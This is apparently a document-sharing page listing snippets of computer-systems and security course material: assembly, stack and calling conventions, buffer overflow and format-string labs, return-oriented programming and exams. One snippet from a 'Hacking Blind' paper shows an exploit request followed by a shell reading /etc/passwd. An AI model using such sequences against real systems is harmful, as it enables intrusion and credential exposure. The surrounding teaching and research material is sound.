Do-While Example. In C++ In assembly language. do { z--; while (a == b); z = b; loop: addi $s2, $s2, -1 beq $s0, $s1, loop or $s2, $s1, $zero Do-While Example In C++ do { z--; while (a == b); z = b; In assembly language loop: addi $s2, $s2, -1 beq $s0, $s1, loop or $s2, $s1, $zero 25 Comparisons Set on less than (slt) compares its source registers

More information

Numbers: positional notation. CS61C Machine Structures. Faux Midterm Review Jaein Jeong Cheng Tien Ee. www-inst.eecs.berkeley.

Numbers: positional notation. CS61C Machine Structures. Faux Midterm Review Jaein Jeong Cheng Tien Ee. www-inst.eecs.berkeley. CS 61C Faux Midterm Review (1) CS61C Machine Structures Faux Midterm Review 2002-09-29 Jaein Jeong Cheng Tien Ee www-inst.eecs.berkeley.edu/~cs61c/ Numbers: positional notation Number Base B B symbols

More information

143A: Principles of Operating Systems. Lecture 4: Calling conventions. Anton Burtsev October, 2017

143A: Principles of Operating Systems. Lecture 4: Calling conventions. Anton Burtsev October, 2017 143A: Principles of Operating Systems Lecture 4: Calling conventions Anton Burtsev October, 2017 Recap from last time Stack and procedure calls What is stack? Stack It's just a region of memory Pointed

More information

Final exam. Scores. Fall term 2012 KAIST EE209 Programming Structures for EE. Thursday Dec 20, Student's name: Student ID:

Final exam. Scores. Fall term 2012 KAIST EE209 Programming Structures for EE. Thursday Dec 20, Student's name: Student ID: Fall term 2012 KAIST EE209 Programming Structures for EE Final exam Thursday Dec 20, 2012 Student's name: Student ID: The exam is closed book and notes. Read the questions carefully and focus your answers

More information

Foundations of Network and Computer Security

Foundations of Network and Computer Security Foundations of Network and Computer Security John Black Lecture #20 Nov 4 th 2004 CSCI 6268/TLEN 5831, Fall 2004 Announcements Quiz #3 Today Need to know what big-endian is Remind me to mention it if I

More information

Computer Architecture and Assembly Language. Practical Session 3

Computer Architecture and Assembly Language. Practical Session 3 Computer Architecture and Assembly Language Practical Session 3 Advanced Instructions division DIV r/m - unsigned integer division IDIV r/m - signed integer division Dividend Divisor Quotient Remainder

More information

Security Lab. Episode 6: Format String Vulnerabilities. Jan Nordholz, Matthias Petschick, Julian Vetter

Security Lab. Episode 6: Format String Vulnerabilities. Jan Nordholz, Matthias Petschick, Julian Vetter Security Lab Episode 6: Format String Vulnerabilities Jan Nordholz, Matthias Petschick, Julian Vetter Prof. Jean-Pierre Seifert Security in Telecommunications TU Berlin SoSe 2015 jan, matthias, julian

More information

Hacking Blind. Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh. Stanford University

Hacking Blind. Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh. Stanford University Hacking Blind Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh Stanford University Hacking 101 Exploit GET /0xDEAD HTTP/1.0 shell $ cat /etc/passwd root:x:0:0:::/bin/sh sorbo:x:6:9:pac:/bin/sh

More information

Chapter 7: User Defined Functions and Stack Mechanics

Chapter 7: User Defined Functions and Stack Mechanics Chapter 7: User Defined Functions and Stack Mechanics Objectives: (a) Demonstrate the ability to analyze simple programs that use library and user defined functions. (b) Describe the organization and contents

More information

CS642: Computer Security

CS642: Computer Security X86 Review Process Layout, ISA, etc. CS642: Computer Security Drew Davidson davidson@cs.wisc.edu From Last Week ACL- based permissions (UNIX style) Read, Write, execute can be restricted on users and groups

More information

15-213/18-243, Fall 2010 Exam 1 - Version A

15-213/18-243, Fall 2010 Exam 1 - Version A Andrew login ID: Full Name: Section: 15-213/18-243, Fall 2010 Exam 1 - Version A Tuesday, September 28, 2010 Instructions: Make sure that your exam is not missing any sheets, then write your Andrew login

More information

Sandboxing Untrusted Code: Software-Based Fault Isolation (SFI)

Sandboxing Untrusted Code: Software-Based Fault Isolation (SFI) Sandboxing Untrusted Code: Software-Based Fault Isolation (SFI) Brad Karp UCL Computer Science CS GZ03 / M030 9 th December 2011 Motivation: Vulnerabilities in C Seen dangers of vulnerabilities: injection

More information

Section 4: Threads and Context Switching

Section 4: Threads and Context Switching CS162 September 19-20, 2017 Contents 1 Warmup 2 1.1 Hello World............................................ 2 2 Vocabulary 2 3 Problems 3 3.1 Join................................................ 3 3.2

More information

Lecture 4 CIS 341: COMPILERS

Lecture 4 CIS 341: COMPILERS Lecture 4 CIS 341: COMPILERS CIS 341 Announcements HW2: X86lite Available on the course web pages. Due: Weds. Feb. 7 th at midnight Pair-programming project Zdancewic CIS 341: Compilers 2 X86 Schematic

More information

Separate compilation. Topic 6: Runtime Environments p.1/21. CS 526 Topic 6: Runtime Environments The linkage convention

Separate compilation. Topic 6: Runtime Environments p.1/21. CS 526 Topic 6: Runtime Environments The linkage convention Runtime Environment The Procedure Abstraction and Separate Compilation Topics we will cover The procedure abstraction and linkage conventions Runtime storage convention Non-local data access (brief) These

More information

Machine Programming 5: Buffer Overruns and Stack Exploits

Machine Programming 5: Buffer Overruns and Stack Exploits Machine Programming 5: Buffer Overruns and Stack Exploits CS61, Lecture 6 Prof. Stephen Chong September 22, 2011 Thinking about grad school in Computer Science? Panel discussion Tuesday September 27th,

More information

CS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016

CS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016 CS 31: Intro to Systems Functions and the Stack Martin Gagne Swarthmore College February 23, 2016 Reminders Late policy: you do not have to send me an email to inform me of a late submission before the

More information

The IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta

The IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta 1 The IA-32 Stack and Function Calls CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta 2 Important Registers used with the Stack EIP: ESP: EBP: 3 Important Registers used with the Stack EIP:

More information

Lecture 07 Heap control data. Stephen Checkoway University of Illinois at Chicago

Lecture 07 Heap control data. Stephen Checkoway University of Illinois at Chicago Lecture 07 Heap control data Stephen Checkoway University of Illinois at Chicago Layout of program memory Heap is managed by malloc - Many different malloc implementations - glibc uses a modified version

More information

Buffer Overflows. A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers.

Buffer Overflows. A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers. Buffer Overflows A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers. By: Brian Roberts What is a buffer overflow? In languages that deal with data structures

More information

System calls and assembler

System calls and assembler System calls and assembler Michal Sojka sojkam1@fel.cvut.cz ČVUT, FEL License: CC-BY-SA 4.0 System calls (repetition from lectures) A way for normal applications to invoke operating system (OS) kernel's

More information

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012 CSC 666 Lab #11 Buffer Overflow November 29, 2012 Copyright c 2012 James Walden, Northern Kentucky University. Original document version c 2006-2012 Wenliang Du, Syracuse University. The development of

More information

Assembler Programming. Lecture 10

Assembler Programming. Lecture 10 Assembler Programming Lecture 10 Lecture 10 Mixed language programming. C and Basic to MASM Interface. Mixed language programming Combine Basic, C, Pascal with assembler. Call MASM routines from HLL program.

More information

CSC369 Lecture 2. Larry Zhang

CSC369 Lecture 2. Larry Zhang CSC369 Lecture 2 Larry Zhang 1 Announcements Lecture slides Midterm timing issue Assignment 1 will be out soon! Start early, and ask questions. We will have bonus for groups that finish early. 2 Assignment

More information

CS61C : Machine Structures

CS61C : Machine Structures inst.eecs.berkeley.edu/~cs61c/su06 CS61C : Machine Structures Lecture #9: MIPS Procedures 2006-07-11 CS 61C L09 MIPS Procedures (1) Andy Carle C functions main() { int i,j,k,m;... i = mult(j,k);... m =

More information

United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring 2015

United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring 2015 United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring 2015 1. Do a page check: you should have 8 pages including this cover sheet. 2. You have 50 minutes

More information

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller Lecture 10 Return-oriented programming Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller ROP Overview Idea: We forge shellcode out of existing application

More information

a) Do exercise (5th Edition Patterson & Hennessy). Note: Branches are calculated in the execution stage.

a) Do exercise (5th Edition Patterson & Hennessy). Note: Branches are calculated in the execution stage. CS3410 Spring 2015 Problem Set 2 (version 3) Due Saturday, April 25, 11:59 PM (Due date for Problem-5 is April 20, 11:59 PM) NetID: Name: 200 points total. Start early! This is a big problem set. Problem

More information

Runtime Integrity Checking for Exploit Mitigation on Embedded Devices

Runtime Integrity Checking for Exploit Mitigation on Embedded Devices Runtime Integrity Checking for Exploit Mitigation on Embedded Devices Matthias Neugschwandtner IBM Research, Zurich eug@zurich.ibm.com Collin Mulliner Northeastern University, Boston collin@mulliner.org

More information

o Code, executable, and process o Main memory vs. virtual memory

o Code, executable, and process o Main memory vs. virtual memory Goals for Today s Lecture Memory Allocation Prof. David August COS 217 Behind the scenes of running a program o Code, executable, and process o Main memory vs. virtual memory Memory layout for UNIX processes,

More information

C and C++: vulnerabilities, exploits and countermeasures

C and C++: vulnerabilities, exploits and countermeasures C and C++: vulnerabilities, exploits and countermeasures Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be Introduction C/C++ programs:

More information

Representation of Information

Representation of Information Representation of Information CS61, Lecture 2 Prof. Stephen Chong September 6, 2011 Announcements Assignment 1 released Posted on http://cs61.seas.harvard.edu/ Due one week from today, Tuesday 13 Sept

More information

EE 109 Unit 15 Subroutines and Stacks

EE 109 Unit 15 Subroutines and Stacks 1 EE 109 Unit 15 Subroutines and Stacks 2 Program Counter and GPRs (especially $sp, $ra, and $fp) REVIEW OF RELEVANT CONCEPTS 3 Review of Program Counter PC is used to fetch an instruction PC contains

More information

Malicious Code Injection via /dev/mem

Malicious Code Injection via /dev/mem Malicious Code Injection via /dev/mem Anthony Lineberry March 27, 2009 Abstract In this paper we will discuss methods for using the character device, /dev/mem, as an entry

More information

Linkers and Loaders. CS 167 VI 1 Copyright 2008 Thomas W. Doeppner. All rights reserved.

Linkers and Loaders. CS 167 VI 1 Copyright 2008 Thomas W. Doeppner. All rights reserved. Linkers and Loaders CS 167 VI 1 Copyright 2008 Thomas W. Doeppner. All rights reserved. Does Location Matter? int main(int argc, char *[ ]) { return(argc); } main: pushl %ebp ; push frame pointer movl

More information

CS , Fall 2004 Exam 1

CS , Fall 2004 Exam 1 Andrew login ID: Full Name: CS 15-213, Fall 2004 Exam 1 Tuesday October 12, 2004 Instructions: Make sure that your exam is not missing any sheets, then write your full name and Andrew login ID on the front.

More information

6 WEEK EXAM NAME: ALPHA: SECTION:

6 WEEK EXAM NAME: ALPHA: SECTION: 6 WEEK EXAM NAME: ALPHA: SECTION: 1. This is individual work. 2. SHOW ALL WORK! 3. Write legibly to receive credit. 4. Turn in your equation sheet. SCORE: /100 SCALE >89.5%: 31337 79.5 89.5%: H@XX0R 69.5

More information